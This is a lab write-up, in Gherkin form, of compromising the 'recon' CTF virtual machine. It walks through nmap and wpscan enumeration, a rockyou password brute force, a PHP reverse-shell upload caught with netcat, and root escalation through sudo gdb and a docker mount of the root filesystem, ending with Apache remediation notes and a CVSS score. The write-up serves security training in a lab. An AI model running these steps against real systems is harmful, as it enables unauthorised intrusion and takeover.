## Version 1.4.1
## language: en

Feature:
  TOE:
    recon
  Category:
    SQL Injection and privilege escalation
  Location:
    http://192.168.0.10:80
  CWE:
    CWE-434: Unrestricted Upload of File with Dangerous Type
  Rule:
    REQ.043: https://fluidattacks.com/web/rules/043/
    REQ.040: The system must validate that the format (structure)
     of the files corresponds to its extension.
    REQ.041: The system must validate that the content of the files
     transferred to the same system is free of malicious code.
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Add type checks to restrict the uploadable file types

  Background:
  Hacker Software:
    | <Software name>   | <Version> |
    | Kali Linux        |  2020.3   |
    | Nmap              |  7.80     |
    | VirtualBox        |  6.1      |
    | Firefox           |  79.0     |
    | WPScan            |  3.8.2    |

  TOE information:
    Given a file with the .OVA file extension is delivered
    When I run it on virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.0.1/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-09 10:46 EST
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.066s latency).
    Nmap scan report for galaxy-a5-2017 (192.168.0.5)
    Host is up (0.055s latency).
    Nmap scan report for android-82aa538a8aa3c784 (192.168.0.6)
    Host is up (0.071s latency).
    Nmap scan report for hulk-buster (192.168.0.10)
    Host is up (0.00063s latency).
    Nmap scan report for kali (192.168.0.13)
    Host is up (0.000093s latency).
    Nmap done: 256 IP addresses (5 hosts up) scanned in 19.77 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.10
    And it has the ports 22 and 80 open
    """
    $ sudo nmap -sV -sS 192.168.0.16
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-09 10:56 EST
    Nmap scan report for hulk-buster (192.168.0.10)
    Host is up (0.00045s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    MAC Address: 08:00:27:8D:6C:6C (Oracle VirtualBox virtual NIC)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at
    Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.10:80/
    And the recon homepage is displayed [evidences](02.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given the website does not show any vulnerabilities with the naked eye
    When I review I notice that it's based on wordpress [evidences](02.png)
    Then I do a user scan using wpscan
    """
    wpscan --url http://192.168.0.10 -e u

    _______________________________________________________________
             __          _______   _____
             \ \        / /  __ \ / ____|
              \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
               \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
                \  /\  /  | |     ____) | (__| (_| | | | |
                 \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________

    [+] URL: http://192.168.0.10/ [192.168.0.10]
    [+] Started: Tue Feb  9 14:32:12 2021

    Interesting Finding(s):

    [+] Headers
    | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
    | Found By: Headers (Passive Detection)
    | Confidence: 100%

    [+] XML-RPC seems to be enabled: http://192.168.0.10/xmlrpc.php
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 100%
    | References:
    |  - http://codex.wordpress.org/XML-RPC_Pingback_API
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/
    wordpress_ghost_scanner
    |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/
    wordpress_xmlrpc_dos
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/
    http/wordpress_xmlrpc_login
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/
    http/wordpress_pingback_access

    [+] http://192.168.0.10/readme.html
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 100%

    [+] Upload directory has listing enabled:
    http://192.168.0.10/wp-content/uploads/
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 100%

    [+] The external WP-Cron seems to be enabled:
    http://192.168.0.10/wp-cron.php
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 60%
    | References:
    |  - https://www.iplocation.net/defend-wordpress-from-ddos
    |  - https://github.com/wpscanteam/wpscan/issues/1299

    [+] WordPress version 5.3.6 identified (Latest, released on 2020-10-30).
    | Found By: Rss Generator (Passive Detection)
    |  - http://192.168.0.10/index.php/feed/, <generator>
    https://wordpress.org/?v=5.3.6</generator>
    |  - http://192.168.0.10/index.php/comments/feed/, <generator>
    https://wordpress.org/?v=5.3.6</generator>

    [+] WordPress theme in use: twentytwenty
    | Location: http://192.168.0.10/wp-content/themes/twentytwenty/
    | Last Updated: 2020-12-09T00:00:00.000Z
    | Readme: http://192.168.0.10/wp-content/themes/twentytwenty/readme.txt
    | [!] The version is out of date, the latest version is 1.6
    | Style URL: http://192.168.0.10/wp-content/themes/twentytwenty
    /style.css?ver=1.1
    | Style Name: Twenty Twenty
    | Style URI: https://wordpress.org/themes/twentytwenty/
    | Description: Our default theme for 2020 is designed to take full
    advantage of the flexibility of the block editor...
    | Author: the WordPress team
    | Author URI: https://wordpress.org/
    |
    | Found By: Css Style In Homepage (Passive Detection)
    |
    | Version: 1.1 (80% confidence)
    | Found By: Style (Passive Detection)
    |  - http://192.168.0.10/wp-content/themes/twentytwenty/style.css?ver=1.1,
    Match: 'Version: 1.1'

    [+] Enumerating Users (via Passive and Aggressive Methods)

    [i] User(s) Identified:

    [+] recon
    | Found By: Author Posts - Author Pattern (Passive Detection)
    | Confirmed By:
    |  Rss Generator (Passive Detection)
    |  Wp Json Api (Aggressive Detection)
    |   - http://192.168.0.10/index.php/wp-json/wp/v2
    /users/?per_page=100&page=1
    |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
    |  Login Error Messages (Aggressive Detection)

    [+] reconauthor
    | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
    | Confirmed By: Login Error Messages (Aggressive Detection)

    [!] No WPVulnDB API Token given, as a result vulnerability data
    has not been output.
    [!] You can get a free API token with 50 daily requests by registering
    at https://wpvulndb.com/users/sign_up

    [+] Finished: Tue Feb  9 14:32:17 2021
    [+] Requests Done: 52
    [+] Cached Requests: 6
    [+] Data Sent: 12.337 KB
    [+] Data Received: 403.899 KB
    [+] Memory used: 184.504 MB
    [+] Elapsed time: 00:00:05
    """
    When I check there are users vulnerable to a possible brute force attack
    Then an attack is made using wpscan
    """
    wpscan --url http://192.168.0.10 -U reconauthor -P
    /usr/share/wordlists/rockyou.txt -t 100
    _______________________________________________________________
             __          _______   _____
             \ \        / /  __ \ / ____|
              \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
               \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
                \  /\  /  | |     ____) | (__| (_| | | | |
                 \/  \/   |_|    |_____/ \___|\__,_|_| |_|

             WordPress Security Scanner by the WPScan Team
                             Version 3.8.2
           Sponsored by Automattic - https://automattic.com/
           @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________

    [+] URL: http://192.168.0.10/ [192.168.0.10]
    [+] Started: Wed Feb 10 09:44:01 2021

    Interesting Finding(s):

    [+] Headers
    | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
    | Found By: Headers (Passive Detection)
    | Confidence: 100%

    [+] XML-RPC seems to be enabled: http://192.168.0.10/xmlrpc.php
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 100%
    | References:
    |  - http://codex.wordpress.org/XML-RPC_Pingback_API
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/
    wordpress_ghost_scanner
    |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/
    wordpress_xmlrpc_dos
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/
    wordpress_xmlrpc_login
    |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/
    wordpress_pingback_access

    [+] http://192.168.0.10/readme.html
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 100%

    [+] Upload directory has listing enabled:
    http://192.168.0.10/wp-content/uploads/
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 100%

    [+] The external WP-Cron seems to be enabled:
    http://192.168.0.10/wp-cron.php
    | Found By: Direct Access (Aggressive Detection)
    | Confidence: 60%
    | References:
    |  - https://www.iplocation.net/defend-wordpress-from-ddos
    |  - https://github.com/wpscanteam/wpscan/issues/1299

    [+] WordPress version 5.3.6 identified (Latest, released on 2020-10-30).
    | Found By: Rss Generator (Passive Detection)
    |  - http://192.168.0.10/index.php/feed/, <generator>https://wordpress.org/
    ?v=5.3.6</generator>
    |  - http://192.168.0.10/index.php/comments/feed/, <generator>
    https://wordpress.org/?v=5.3.6</generator>

    [+] WordPress theme in use: twentytwenty
    | Location: http://192.168.0.10/wp-content/themes/twentytwenty/
    | Last Updated: 2020-12-09T00:00:00.000Z
    | Readme: http://192.168.0.10/wp-content/themes/twentytwenty/readme.txt
    | [!] The version is out of date, the latest version is 1.6
    | Style URL: http://192.168.0.10/wp-content/themes/twentytwenty/
    style.css?ver=1.1
    | Style Name: Twenty Twenty
    | Style URI: https://wordpress.org/themes/twentytwenty/
    | Description: Our default theme for 2020 is designed
    to take full advantage of
    the flexibility of the block editor...
    | Author: the WordPress team
    | Author URI: https://wordpress.org/
    |
    | Found By: Css Style In Homepage (Passive Detection)
    |
    | Version: 1.1 (80% confidence)
    | Found By: Style (Passive Detection)
    |  - http://192.168.0.10/wp-content/themes/twentytwenty/style.css?ver=1.1,
    Match: 'Version: 1.1'

    [+] Enumerating All Plugins (via Passive Methods)

    [i] No plugins Found.

    [+] Enumerating Config Backups (via Passive and Aggressive Methods)

    [i] No Config Backups Found.

    [+] Performing password attack on Wp Login against 4 user/s
    [SUCCESS] - reconauthor / football7
    [!] Valid Combinations Found:
    | Username: reconauthor, Password: football7
    """
    Given the results I find the password for the reconauthor user
    When I log in to the admin panel [evidence](03.png)
    Then I explore and find a possible vulnerability for LFI

  Scenario: Exploitation
    Given the site is vulnerable to Local File Inclusion
    When I load the php-revshell script [evidences](04.png)
    Then I notice that the extension .php not allowed
    And I create a compressed .zip with the php-revshell.php and index.html
    """
    zip miyyer1946.zip php-revshell.php index.html

    adding: php-revshell.php (deflated 59%)
    adding: index.html (stored 0%)
    """
    Then I charge the file .zip [evidences](05.png)(06.png)
    And I use the resource to make a reverse connection
    """
    http://192.168.0.10/wp-content/uploads/articulate_uploads/miyyer1946/
    php-revshell.php
    """
    Then I configure the attacking machine to listen connections
    """
    nc -lvp 1234
    listening on [any] 1234 ...
    connect to [192.168.0.13] from hulk-buster [192.168.0.10] 37882
    Linux hulk-buster 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45
    22:25:56 up  2:21,  0 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    """
    Given the vulnerability it is used Interactive Terminal Spawned via Python
    """
    $ python3 -c 'import pty;pty.spawn("/bin/bash")'
    www-data@hulk-buster:/$ cd /home
    cd /home
    www-data@hulk-buster:/home$ ls
    ls
    hacker  offensivehack
    www-data@hulk-buster:/home$ cd offensivehack
    cd offensivehack
    www-data@hulk-buster:/home/offensivehack$ sudo -l
    sudo -l
    Matching Defaults entries for www-data on hulk-buster:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\
    :/sbin\:/bin\:/snap/bin

    User www-data may run the following commands on hulk-buster:
    (offensivehack) NOPASSWD: /usr/bin/gdb
    """
    Then I see the www-data user has the permissions to run the /usr/bin/gdb
    And I run the command to get the shell using offensivehack
    """
    www-data@hulk-buster:/home/offensivehack$ sudo -u offensivehack
    gdb -nx -ex '!bash' -ex quit
    <offensivehack$ sudo -u offensivehack gdb -nx -ex '!bash' -ex quit
    GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
    Copyright (C) 2016 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later
    <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word".
    offensivehack@hulk-buster:~$ id
    id
    uid=1001(offensivehack) gid=119(docker) groups=119(docker)
    """
    When I look at how the current user is added to the docker group
    Then I check the available docker images
    And I run the ubuntu image and get the root user
    """
    offensivehack@hulk-buster:~$ docker images
    docker images
    REPOSITORY          TAG                 IMAGE ID
    ubuntu              latest              ccc6e87d482b
    offensivehack@hulk-buster:~$ docker run -it -v /:/mnt ubuntu
    docker run -it -v /:/mnt ubuntu
    root@ec7dbd5ef513:/# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@ec7dbd5ef513:/# pwd
    pwd
    /
    root@ec7dbd5ef513:/# cd /root
    cd /root
    root@ec7dbd5ef513:~# ls
    ls
    root@ec7dbd5ef513:~# cd /mnt/root
    cd /mnt/root
    root@ec7dbd5ef513:/mnt/root# ls
    ls
    flag.txt
    root@ec7dbd5ef513:/mnt/root# cat flag.txt
    cat flag.txt
    """
    Given the new privileges on the flag.txt
    Then the flag is read [evidences](07.png)

  Scenario: Remediation
    Given The site is susceptible to Local File Inclusion
    Then a possible solution is to modify the apache2.conf file
    """
    <FilesMatch "^\.ht">
            Require all denied
    </FilesMatch>
    """
    And modify it to not allow the inclusion of php files
    """
    <Files ~ ".*\..*">
    Order Allow,Deny
    Deny from all
    </Files>
    <FilesMatch "\.(jpg|jpeg|jpe|gif|png|bmp|tif|tiff|doc|pdf|rtf|xls|numbers|
    odt|pages|key|zip|rar)$">
    Order Deny,Allow
    Allow from all
    </FilesMatch>
    """

  Scenario: Scoring
   Severity scoring according to CVSSv3 standard
   Base: Attributes that are constants over time and organizations
     10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
   Temporal: Attributes that measure the exploit's popularity and fixability
     7/10 (high) - E:H/RL:O/RC:C
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2021-02-11
